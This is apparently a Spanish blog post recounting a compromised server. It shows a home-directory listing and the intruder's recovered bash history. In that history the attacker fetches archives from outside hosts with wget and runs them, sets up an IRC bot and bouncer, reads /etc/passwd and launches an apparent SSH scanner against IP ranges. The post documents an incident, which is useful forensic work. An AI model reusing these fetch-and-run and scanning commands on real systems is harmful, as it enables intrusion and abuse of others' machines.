Historia de un Servidor Comprometido

Add Log

ls -al /home/info

drwxr-xr-x 6 root root 4096 Mar 13 17:40 ..

-rwxr-xr-x 1 info mailusers 655360 May 26 2005 2004

-rw-r–r– 1 info mailusers 269190 Jan 9 08:42 2004.TGZ

-rw-r–r– 1 info mailusers 522574 Feb 22 15:40 alex.tgz

-rw——- 1 info mailusers 1733 Mar 12 21:08 .bash_history

drwxr-xr-x 4 info mailusers 4096 Mar 12 11:47 emech

-rw-r–r– 1 info mailusers 233421 Mar 8 20:56 emech.tgz

drwxr-xr-x 3 info mailusers 4096 Jul 15 2007 psybnc-linux <<<<<psybnc?_??>

-rw-r–r– 1 info mailusers 568152 Sep 22 03:27 psybnc-linux.tgz

drwxr-xr-x 2 info mailusers 4096 Mar 12 18:48 ssh

-rw-r–r– 1 info mailusers 754228 Mar 6 21:22 ssh1.tgz

cat of history

w

cat /etc/hosts

w

ps x

ls -a

uname -a

wget http://nasa.undernet.nm.ru/2004.TGZ

tar zxvf 2004.TGZ

chmod +x 204

chmod +x 2004

./2004

uname -a

cat /etc/issue

ls -a

cat /etc/passwd

cd /tmp

ls -a

cd .webmin

ls -a

cd /dev/shm

ls -a

cat /proc/cpuinfo

wget http://ethical.ro/alex.tgz

tar zxvf alex.tgz

cd “. ”

./linux

chmod +x *

./linux

ls -a

cd /tmp

wget http://ethical.ro/alex.tgz

wget http://ethical.ro/emech.tgz

tar zxvf emech.tgz

cd emech

ls -a

rm -rf cyc.set

nano cyc.acc

nano cyc.acc.2

nano cyc.acc.3

nano cyc.acc.4

nano cyc.acc.5

wget http://ethical.ro/cyc.set

chmod +x *

killall -9 linux

./httpd

wget http://ftp.rz.tu-bs.de/pub/mirror/knoppix/knoppix-cd/KNOPPIX_V5.1.1CD-2007-01-04-DE.iso

wget ftp://ftp.kernel.org/pub/linux/kernel/v2.6/linux-2.6.9.tar.gz

wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

ps x

w

ps x

w

pwd

cd

ls -a

wget http://ethical.ro/ssh1.tgz

tar zxvf ssh1.tgz <<<<cd ssh

./a 207.97

./a 210.97

./a 200.105

./a 62.2

./a 132.230

./a 190.66

./a 200.81

cat /etc/issue

w

uname -a

./a 220.34

./a 220.134</psybnc?_??>